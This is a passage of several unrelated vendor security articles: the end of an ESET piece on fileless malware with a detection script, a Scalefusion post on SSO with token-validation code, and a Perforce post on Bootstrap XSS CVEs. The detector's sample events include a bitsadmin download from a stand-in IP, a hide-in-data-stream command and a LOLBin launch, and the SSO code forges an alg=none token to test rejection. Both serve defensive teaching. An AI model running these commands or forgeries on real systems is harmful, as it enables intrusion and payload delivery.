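# Constructed sample telemetry modelled on the Astaroth/Guildma chain described above (not real logs).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe //e:jscript "C:\Users\alice\AppData\Local\Temp\invoice.lnk.js"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer job /download /priority high http://203.0.113.5/x.bin C:\Users\Public\x.bin"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c type C:\Users\Public\x.bin > "C:\Users\Public\desktop.ini:stream"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Users\Public\ExtExport.exe",
              r"C:\Users\Public\ExtExport.exe C:\Users\Public"),
    # benign administrative use: bitsadmin without a download switch, launched from explorer
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /list /allusers"),
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}  <- {SAMPLE_EVENTS[idx].command_line}")
    for parent, names in correlate(SAMPLE_EVENTS).items():
        print(f"chain under {parent}: {', '.join(names)}")
```

The single-hit rules are noisy on their own (an administrator legitimately running bitsadmin, for instance), which is why the example only escalates when several distinct techniques share a parent process. In a real deployment the same logic would be a SIEM or EDR query over Sysmon event ID 1 (process creation) rather than a Python list.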

Protecting against fileless threats

ESET Endpoint Security’s multilayered product features an Advanced Memory Scanner module, which, combined with our Exploit Blocker, protects against malware designed with evasiveness in mind. Additionally, thanks to different forms of Advanced Machine Learning employed within, detections are fine-tuned to offer the best detection rates.

Memory scanning is what discovers active in-memory fileless attacks that lack persistent components in the file system, as was the case with Astaroth (Guildma) and its use of the Windows toolset.

Furthermore, the ESET Host-based Intrusion Prevention System (HIPS) and its Deep Behavioral Inspection (DBI) use predefined rules to monitor suspicious behavior of running processes, files, and registry keys, targeting the methods fileless malware often uses to hide its activity. Hence, malware families like Kovter find it hard to hide from ESET Endpoint Security in the Windows registry: the encrypted payload has to be decrypted into memory to run, and that is where the memory scanner inspects it.

Issue-less

With cybersecurity protections stepping up to defend against advanced threats such as fileless malware, one thing still needs saying: never click links or open attachments in suspicious emails, even if they appear to come from someone you know and trust.

First, reach out to the apparent sender via a different communications medium (a text, a phone call, or in person for something received by email) and verify that they really sent the message, and why. This might seem like overkill, but social engineering has become sophisticated enough to fool anyone.

As always, exploiting human error remains the most reliable avenue for a compromise, so stay informed by reading our ESET Blogs, WeLiveSecurity, and ESET Research on Twitter (now X) to keep ahead of the threat landscape.

In addition, try our free ESET Cybersecurity Awareness Training to learn how to stay secure at all times.

About ESET
For 30 years, ESET® has been developing industry-leading IT security software and services for businesses and consumers worldwide. With solutions ranging from endpoint security to encryption and two-factor authentication, ESET’s high-performing, easy-to-use products give individuals and businesses the peace of mind to enjoy the full potential of their technology. ESET unobtrusively protects and monitors 24/7, updating defenses in real time to keep users safe and businesses running without interruption. Evolving threats require an evolving IT security company. Backed by R&D facilities worldwide, ESET became the first IT security company to earn 100 Virus Bulletin VB100 awards, identifying every single “in-the-wild” malware without interruption since 2003.

Beyond Passwords: Securing Access on BYOD with Single Sign-On

How frustrating is managing multiple logins across devices during your workday? A lot, right? First, you’re constantly trying to remember multiple passwords. Then you face interruptions like password resets, multiple authentication prompts, or security checks every time you switch between your laptop, phone, or tablet, slowing down your productivity. This kind of friction is common in workplaces that have adopted Bring Your Own Device (BYOD) policies.

What about this on a company-wide scale? Employees waste time logging in repeatedly, managing passwords across multiple devices, or worse, reusing the same passwords across platforms. 44% or more of employees globally reuse passwords, which opens up significant security risk.[1] For businesses dependent on BYOD, this is a ticking time bomb of productivity loss and security vulnerabilities.

This is where Single Sign-On (SSO) comes in. With SSO, employees can securely log in just once, regardless of the device, and access all their authorized apps and systems without needing to enter passwords repeatedly.

By integrating BYOD with SSO, companies can save employees valuable time and reduce the risk of security breaches from weak or reused passwords.

The Impact and Downsides of a BYOD Setup

In a BYOD setup, employees often use multiple apps and services, each requiring its own password. This leads to frustration and lost productivity, not to mention lapses in security. When people have to remember so many passwords, they tend to pick weak ones or reuse them across accounts. According to Verizon’s Data Breach Investigations Report, 81% of hacking-related breaches involved stolen or weak passwords.[2] This makes the issue quite serious.

For IT teams, dealing with this password overload is no small task. Managing countless passwords, making sure they’re updated regularly, and handling password reset requests can be incredibly time-consuming. This not only increases the risk of security breaches but also frustrates employees, leading to lower productivity and more frequent IT support issues. The complexity of managing passwords in a BYOD environment can really take a toll on both security and efficiency.

Single Sign-On: Simplifying the User Experience

SSO is a master key that unlocks all the doors you need. Once logged in through an SSO system, users can access multiple applications without having to log in separately for each one.

How SSO Works:

  • Unified Access: Users authenticate once through a central login page and gain access to various applications and services. This means no more juggling multiple passwords or facing login barriers throughout the day.
  • Reduced Password Fatigue: By minimizing the number of passwords employees need to remember, SSO reduces the temptation to use weak or reused passwords. This simple change can significantly enhance overall security.
  • Streamlined User Experience: SSO provides a smoother and faster login process, enhancing productivity and reducing frustration. Employees can spend more time focusing on their work rather than dealing with login issues.

Consider an employee at a marketing firm who needs to access their email, project management tool, and CRM system. Without SSO, they would need to enter different credentials for each application, which can be time-consuming and error-prone. With SSO, a single login grants them access to all these systems, saving time and reducing the risk of login-related security issues.

How SSO Strengthens BYOD Security

Managing security across various devices and applications can be next to impossible in a BYOD environment, which is heavily fragmented by device/OS diversity. SSO offers a streamlined way to ensure secure access to corporate apps without compromising user experience.

By allowing employees to authenticate once and gain access to all necessary systems through a single set of credentials, SSO simplifies the login process and eliminates the need for multiple passwords. But beyond convenience, SSO provides critical security enhancements that address many of the vulnerabilities introduced by BYOD policies.

Here’s how SSO strengthens BYOD security:

  • Reduced Risk of Password Fatigue: By allowing employees to use just one set of credentials, SSO reduces the likelihood of weak or reused passwords, a common security risk. Fewer passwords mean fewer entry points for attackers; the flip side is that the one remaining credential becomes a high-value target, so it must itself be protected with MFA.
  • Centralized Access Control: With SSO, IT teams have a single point of control to manage who can access which applications and resources. This means more consistent security policies across devices and the ability to monitor and adjust access in real time.
  • Improved Monitoring and Auditing: SSO systems typically include detailed reporting and monitoring features. IT can track who is accessing what, when, and from where, making it easier to identify suspicious activity or unauthorized access attempts.
  • Multi-Factor Authentication (MFA) Integration: SSO often works hand-in-hand with MFA, adding an extra layer of security. Even if someone gains access to an employee’s password, MFA ensures they can’t access systems without a second verification step, such as a fingerprint or one-time code.
  • Faster Response to Security Threats: With centralized access, IT teams can swiftly revoke or adjust permissions across all applications if a security threat is detected, preventing unauthorized access to sensitive information.
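
To make the “authenticate once, then reach every app” flow and the controls in the list above concrete, here is an added example (not Scalefusion’s, OneIdP’s or any identity provider’s code) of what the application on the receiving end must check before trusting an SSO login: a token issued by the identity provider is accepted only if its signature, issuer, audience, expiry and login nonce check out, if the identity provider recorded an MFA step, and if IT has not centrally revoked the session. The IdP and the app share an HS256 key so the block runs offline; real OIDC deployments sign with RS256 or ES256 and the app fetches the IdP’s public keys from its JWKS endpoint. ISSUER, AUDIENCE, the key and the sample users are assumptions.

```python
"""Relying-party validation of an SSO token (added example; not Scalefusion, OneIdP or IdP code).

Assumptions: ISSUER, AUDIENCE and SHARED_KEY are made up for this example, and HS256
with a shared key stands in for the RS256/ES256-with-JWKS signing real OIDC IdPs use.
"""
import base64
import hashlib
import hmac
import json
import time

ISSUER = "https://idp.example.com"          # assumed identity provider
AUDIENCE = "crm-app"                        # assumed client_id the IdP issues tokens for
SHARED_KEY = b"example-only-shared-secret"  # assumed; real deployments use the IdP's asymmetric keys
REVOKED_SESSIONS: set[str] = set()          # central revocation list that IT controls


class TokenError(Exception):
    """Raised with a short reason whenever the token must not be trusted."""


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(sub: str, sid: str, amr: list[str], nonce: str, now: int, ttl: int = 300) -> str:
    """IdP side: mint a short-lived HS256 JWT after the user authenticated once."""
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {"iss": ISSUER, "aud": AUDIENCE, "sub": sub, "sid": sid,
              "amr": amr, "nonce": nonce, "iat": now, "exp": now + ttl}
    signing_input = f"{_b64url(json.dumps(header).encode())}.{_b64url(json.dumps(claims).encode())}"
    tag = hmac.new(SHARED_KEY, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(tag)}"


def validate_token(token: str, expected_nonce: str, now: int, require_mfa: bool = True) -> dict:
    """App side: every check an SSO relying party must do before creating a local session."""
    try:
        h_b64, c_b64, s_b64 = token.split(".")
        header = json.loads(_b64url_decode(h_b64))
        signature = _b64url_decode(s_b64)
    except ValueError as exc:
        raise TokenError("malformed") from exc
    # Pin the algorithm: never let the token choose it (blocks the classic alg=none bypass).
    if header.get("alg") != "HS256":
        raise TokenError("unexpected alg")
    expected = hmac.new(SHARED_KEY, f"{h_b64}.{c_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):   # constant-time comparison
        raise TokenError("bad signature")
    try:
        claims = json.loads(_b64url_decode(c_b64))
    except ValueError as exc:
        raise TokenError("malformed") from exc
    if claims.get("iss") != ISSUER:
        raise TokenError("wrong issuer")
    if claims.get("aud") != AUDIENCE:            # a token minted for another app must not work here
        raise TokenError("wrong audience")
    if not isinstance(claims.get("exp"), int) or now >= claims["exp"]:
        raise TokenError("expired")
    if claims.get("nonce") != expected_nonce:    # ties the token to this login attempt (anti-replay)
        raise TokenError("nonce mismatch")
    if require_mfa and "mfa" not in claims.get("amr", []):
        raise TokenError("mfa required")
    if claims.get("sid") in REVOKED_SESSIONS:    # central kill switch: revoke once, every app obeys
        raise TokenError("session revoked")
    return claims


def check(token: str, expected_nonce: str, now: int, require_mfa: bool = True) -> str:
    """Convenience wrapper: 'ok' or the reason the token was rejected."""
    try:
        validate_token(token, expected_nonce, now, require_mfa)
        return "ok"
    except TokenError as err:
        return str(err)


def revoke_session(sid: str) -> None:
    """What IT does from the central console when a device is lost or an employee leaves."""
    REVOKED_SESSIONS.add(sid)


def forge_unsigned(token: str) -> str:
    """Attacker's move: replay the claims under an alg=none header with no signature."""
    _, c_b64, _ = token.split(".")
    return f"{_b64url(json.dumps({'alg': 'none', 'typ': 'JWT'}).encode())}.{c_b64}."


if __name__ == "__main__":
    now = int(time.time())
    tok = issue_token("alice@example.com", "sess-1", ["pwd", "mfa"], "nonce-1", now)
    print("valid login:", check(tok, "nonce-1", now + 10))
    print("replayed under alg=none:", check(forge_unsigned(tok), "nonce-1", now + 10))
    revoke_session("sess-1")
    print("after central revocation:", check(tok, "nonce-1", now + 10))
```

Note that the app never sees the password; it only decides whether to trust the identity provider’s statement. That is why the audience and nonce checks matter: without them a token stolen from one app, or captured from an earlier login, would open every other app, and the session identifier is what lets a single revocation from the console cut off every device at once.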

The Industry and Geographic Perspective on BYOD and SSO

The approach to BYOD and SSO varies across industries and regions, reflecting different challenges and strategies.

Industries

  • Healthcare: Protecting patient data is paramount in healthcare. SSO simplifies access to electronic health records (EHRs) and other medical systems, so that clinicians can reach the information they need without compromising security. By centralizing the login process, SSO helps enforce consistent access controls, which supports compliance with regulations like HIPAA while reducing the risk of unauthorized access.
  • Education: Educational institutions often have diverse user groups, including students, teachers, and administrative staff, all needing access to various platforms. SSO provides a unified access point, simplifying the login process and enhancing security across educational tools and systems. It also helps protect student identity online by managing access centrally.
  • Finance: The financial sector faces strict regulations and high-security requirements. SSO solutions here integrate with advanced security measures, such as MFA and risk-based authentication, to secure financial transactions and sensitive data. By streamlining access management, financial institutions can meet compliance requirements while protecting against fraud and unauthorized access.

Regional Variations

  • North America and Europe: These regions are at the forefront of adopting advanced security measures, including SSO and Zero Trust frameworks, particularly due to widespread BYOD policies. 73% of organizations in North America have a defined Zero Trust initiative in place, which heavily relies on secure access management strategies like SSO.[3] The rise of remote work and stringent data protection laws, such as GDPR in Europe and the California Consumer Privacy Act, have further driven SSO adoption. As organizations prioritize securing both internal and external access, SSO has become essential in mitigating password-related risks and ensuring compliance.
  • Emerging Markets: The adoption of SSO is on the rise as BYOD policies and remote work become more commonplace in emerging markets. While cost and infrastructure limitations have historically slowed initial adoption, demand for secure access management is clearly growing. The global SSO market, valued at USD 3.51 billion in 2022, is expected to grow to USD 10.80 billion by 2031 at a CAGR of 13.3%.[4] This points to a broader trend of increasing reliance on SSO across markets, including emerging ones. As these regions mature technologically, SSO will play an essential role in managing secure access, especially in BYOD environments where authentication must be simplified across devices.

BYOD Security with Scalefusion OneIdP’s SSO

Whether it’s a BYOD setup or a traditional office environment, securing access across various devices is vital. Scalefusion helps enterprise IT teams enforce corporate policies on work apps and resources on BYO devices. Further, with Scalefusion OneIdP’s SSO solution, IT teams can ensure that employees securely access multiple apps with a single login, whether they use personal laptops, smartphones, or tablets.

Scalefusion OneIdP simplifies user authentication and also strengthens security with centralized access control, integration with multi-factor authentication (MFA), and real-time access monitoring. This eliminates password fatigue, reduces entry points for attacks, and enhances productivity by ensuring that employees can access the tools they need quickly and securely.

Contact our experts and schedule a demo to learn more about Scalefusion OneIdP.

References:

  1. Dashlane
  2. Silicon
  3. Okta
  4. SkyQuest

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Scalefusion
Scalefusion’s company DNA is built on the foundation of providing world-class customer service and making endpoint management simple and effortless for businesses globally. We prioritize the needs and feedback of our customers, making sure that they are at the forefront of all decision-making processes. We are dedicated to providing comprehensive customer support services, and place emphasis on customer-centric thinking throughout the organization.

New Bootstrap Vulnerabilities to Watch

New Bootstrap vulnerabilities could spell trouble for those with websites or web apps running Bootstrap 3 or Bootstrap 4, which are end of life and no longer community-supported. 

Keep reading to find out how these vulnerabilities can be exploited to engineer cross-site scripting (XSS) attacks and what to do to enhance your Bootstrap security. 

Recently Disclosed Bootstrap Vulnerabilities: Who Is Impacted?

In July 2024, three vulnerabilities affecting end-of-life (EOL) versions of Bootstrap were disclosed: CVE-2024-6484, CVE-2024-6485 and CVE-2024-6531.

All three CVEs received a CVSS score of 6.4 from the National Vulnerability Database, indicating medium severity.  


CVE-2024-6484 and CVE-2024-6485 impact Bootstrap 3, and CVE-2024-6531 affects Bootstrap 4. If you have applications or websites running either of these EOL versions, you are at risk.


How Do These Bootstrap Vulnerabilities Work?

CVE-2024-6484 and CVE-2024-6531 are identical cross-site scripting (XSS) vulnerabilities in the Bootstrap carousel component, affecting different Bootstrap versions. This component lets you define the slide behavior of links in the carousel via "data" attributes. The vulnerability becomes exploitable when user-supplied values are placed in these attributes without adequate sanitization.

CVE-2024-6485 is a similar vulnerability, but targets the button plugin and its loading text state. 
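As an added illustration of the defensive side of the point above (this is not Bootstrap's or the article's code), a page that renders carousel controls from user-supplied values keeps an allow-list of the carousel data attributes and the shapes their values may take, and escapes everything it writes out. The attribute names are Bootstrap's carousel control attributes; the value rules, the sample input and the function names are this example's own assumptions.

```javascript
// Added example, not Bootstrap's or the article's code: allow-list the
// carousel data attributes and the shape of their values before they are
// written into markup, so a user-controlled value cannot introduce HTML.
// Attribute names are Bootstrap 3/4 carousel controls; the value rules are
// this example's own assumptions about what a legitimate control needs.
const CAROUSEL_ATTR_RULES = {
  "data-slide": (v) => v === "prev" || v === "next",       // direction only
  "data-slide-to": (v) => /^\d{1,3}$/.test(v),             // slide index
  "data-target": (v) => /^#[A-Za-z][\w-]*$/.test(v),       // "#" + plain id
  href: (v) => /^#[A-Za-z][\w-]*$/.test(v),                // same for href
};

// Escape the characters that can break out of a double-quoted attribute
// or start a tag inside element text.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Keep only attributes whose name is known and whose value passes its rule.
// Rejected names are returned so the caller can log the attempt.
function filterCarouselAttrs(userAttrs) {
  const accepted = {};
  const rejected = [];
  for (const [name, value] of Object.entries(userAttrs)) {
    const rule = CAROUSEL_ATTR_RULES[name];
    if (rule && typeof value === "string" && rule(value)) accepted[name] = value;
    else rejected.push(name);
  }
  return { accepted, rejected };
}

// Render a carousel control anchor from user input. Values are escaped even
// though they already passed the allow-list (defence in depth).
function renderCarouselControl(userAttrs, label) {
  const attrs = Object.entries(filterCarouselAttrs(userAttrs).accepted)
    .map(([k, v]) => `${k}="${escapeAttr(v)}"`)
    .join(" ");
  return `<a class="carousel-control" ${attrs}>${escapeAttr(label)}</a>`;
}

// Constructed sample input: a value carrying markup is dropped, not rendered.
const sample = { href: "#demo", "data-slide": "next<b>", "data-slide-to": "2" };
console.log(filterCarouselAttrs(sample).rejected); // ["data-slide"]
console.log(renderCarouselControl({ href: "#demo", "data-slide": "prev" }, "Prev"));
```

The same allow-list approach applies to the button plugin's loading-text value: decide the exact shapes you accept, reject everything else, and escape on output regardless.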

Consequences and Costs of a Cross-Site Scripting Attack

As defined by the Open Worldwide Application Security Project (OWASP), a cross-site scripting (XSS) attack is a vector by which a malicious script is injected into a website. These can be relatively trivial, and just inject new content or data into the website — or more nefarious, and transmit data, like session login information, to a third party under the attacker’s control.   

Some examples of what can be accomplished via an XSS attack: 

  • Form contents could be sent to a third party instead of the site, leading to leakage of PII or financial information. 
  • A link could submit a form to a malicious site, returning data that the browser then assumes is trusted, but which in fact contains and executes additional malicious code.
  • A session cookie could be hijacked and used by the attacker to gain access to the user session and data on the website. The attacker can now impersonate the user and gain access to their information, which might include PII or payment methods. If the user has admin privileges on the website, the attacker could gain access to administration tools, potentially changing any content on the site. 
  • A script could modify site contents, such as a press release or blog post, providing false information to consumers and damaging the credibility of the site owner. 

While XSS attacks have been known about and categorized for literally decades, they are still serious security concerns for web-based applications. 


Mitigation and How to Improve Bootstrap Security

There are a number of general measures you can take to mitigate XSS attacks. The most basic is to validate all user input, and to use robust sanitization and normalization when rendering user-provided input, so that script injection cannot occur in the first place. Additionally, you can set the HttpOnly flag on cookies, which prevents JavaScript from reading them, and add Content Security Policy HTTP headers, which restrict the scripts a browser is allowed to execute and so block unauthorized third-party JavaScript.

However, when using third-party JavaScript frameworks such as Bootstrap, sometimes you cannot audit every bit of JS that your application executes.  

In those cases, you can apply your own patch or migrate to the current version of Bootstrap, Bootstrap 5. If neither of those is possible, it is recommended to get long-term support through a commercial partner like OpenLogic so that you have access to patches when vulnerabilities affecting EOL versions are disclosed. OpenLogic has patched all three of these CVEs for our Bootstrap LTS customers.


Final Thoughts

Once open source software reaches end of life, vulnerabilities become harder to deal with since you can’t rely on the community to provide a fix quickly. As described above, the fallout from XSS attacks can be somewhat minor (false information/vandalism to your site) or devastating (sensitive customer data stolen), so if you are running an older version of Bootstrap, it’s time to upgrade or make sure you have an LTS provider. 

About Perforce
The best run DevOps teams in the world choose Perforce. Perforce products are purpose-built to develop, build and maintain high-stakes applications. Companies can finally manage complexity, achieve speed without compromise, improve security and compliance, and run their DevOps toolchains with full integrity. With a global footprint spanning more than 80 countries and including over 75% of the Fortune 100, Perforce is trusted by the world’s leading brands to deliver solutions to even the toughest challenges. Accelerate technology delivery, with no shortcuts.